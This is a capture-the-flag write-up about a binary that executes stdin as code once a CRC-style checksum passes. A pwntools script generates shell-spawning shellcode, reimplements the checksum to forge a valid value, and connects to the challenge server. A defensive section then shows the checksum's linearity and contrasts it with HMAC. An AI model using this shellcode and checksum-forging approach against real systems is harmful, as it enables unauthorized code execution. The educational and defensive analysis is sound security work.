Tags: crc firmware reversing
The challenge binary read data from stdin and executed it as code, but only if the input passed a CRC-style check, so getting code execution meant reimplementing that check and producing the correct checksum for our shellcode.
```python
from pwn import *
import binascii

context.arch = "x86_64"
#context.log_level = 'debug'

shellcode = asm(shellcraft.sh())

# Python port of the binary's checksum loop; the comment on each line names
# the instruction it mirrors. edi is the 32-bit running state, cl the bit index.
edi = 0
for char in shellcode:              # iterating bytes yields ints (Python 3)
    itera = 7                       # mov cl, 7
    while itera >= 0:               # cmp cl, 0
        r9 = 0                      # xor r9, r9
        edi2 = edi << 1             # shl edi, 1
        if edi & 0x80000000:        # cmovb r9, rax (carry out of the shift)
            r9 = 0x80000011
        r10b_shr = char >> itera                 # shr r10b, cl
        r10b_and = r10b_shr & 1                  # and r10b, 1
        edi_xor = (r10b_and ^ edi2) & 0xFF       # xor dil, r10b
        edi2 = (edi2 & 0xFFFFFF00) | edi_xor     # low byte back in, bit 32 of the shift dropped
        edi = edi2 ^ r9             # xor rdi, r9
        itera = itera - 1           # dec cl

#p = process("./nii")
p = remote("2020.redpwnc.tf", 31215)
```
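The check above is a gate on corruption, not on trust: anyone who can read the binary can recompute the value, and because every step of the loop (shift, conditional XOR with a constant, XOR of the data bit) is linear over GF(2) with a zero initial state, the checksum of the XOR of two equal-length inputs is the XOR of their checksums. The example below is added here and is not part of the original writeup; `nii_checksum` is my compact reading of the loop shown above (same state update, written as a function), the `verify_*` names and the sample buffers are constructed for illustration, and the keyed tag is the standard `hmac` module, shown only to contrast a check that does not have this property.

```python
import hmac
import hashlib

POLY = 0x80000011  # constant the binary's cmovb loads when the shift carries out
MASK32 = 0xFFFFFFFF


def nii_checksum(data: bytes) -> int:
    """Compact form of the writeup's loop: MSB-first, 32-bit state, zero init.

    Per bit: shift the state left, XOR in the data bit at the bottom, and if
    the shift carried out of bit 31, XOR in POLY.
    """
    state = 0
    for byte in data:
        for i in range(7, -1, -1):
            bit = (byte >> i) & 1
            carry = state & 0x80000000
            state = ((state << 1) & MASK32) ^ bit
            if carry:
                state ^= POLY
    return state


def verify_with_checksum(payload: bytes, tag: int) -> bool:
    """Model of the challenge's gate: accept if the recomputed checksum matches."""
    return nii_checksum(payload) == tag


def xor_bytes(a: bytes, b: bytes) -> bytes:
    assert len(a) == len(b)
    return bytes(x ^ y for x, y in zip(a, b))


def checksum_is_linear(a: bytes, b: bytes) -> bool:
    """True when crc(a) ^ crc(b) == crc(a ^ b); holds for every pair here."""
    return nii_checksum(a) ^ nii_checksum(b) == nii_checksum(xor_bytes(a, b))


def keyed_tag(key: bytes, payload: bytes) -> bytes:
    """Keyed alternative: HMAC-SHA256 (standard library, not the challenge's code)."""
    return hmac.new(key, payload, hashlib.sha256).digest()


def verify_with_hmac(key: bytes, payload: bytes, tag: bytes) -> bool:
    # compare_digest avoids leaking the mismatch position through timing
    return hmac.compare_digest(keyed_tag(key, payload), tag)


def hmac_is_linear(key: bytes, a: bytes, b: bytes) -> bool:
    """Same relation tested against the keyed tag; expected to be False."""
    ta, tb, tab = keyed_tag(key, a), keyed_tag(key, b), keyed_tag(key, xor_bytes(a, b))
    return xor_bytes(ta, tb) == tab


if __name__ == "__main__":
    # constructed sample buffers, not data from the challenge
    a = b"\xde\xad\xbe\xef\x00\x11"
    b = b"\x12\x34\x56\x78\x9a\xbc"
    key = b"constructed-demo-key"
    print("crc(a)   = %#010x" % nii_checksum(a))
    print("crc linear over xor:", checksum_is_linear(a, b))   # True
    print("hmac linear over xor:", hmac_is_linear(key, a, b))  # False
```

The practical reading for a defender: a CRC (or any unkeyed linear checksum) in front of an execution path only filters accidental corruption; if the input comes from an untrusted peer, the gate needs a secret (a keyed MAC) or a signature, and the check should be compared in constant time as above.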
The full writeup with explanation of the whole reversing process is here.